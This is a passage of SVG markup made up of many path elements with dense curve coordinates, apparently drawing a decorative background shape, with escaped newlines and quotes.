d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1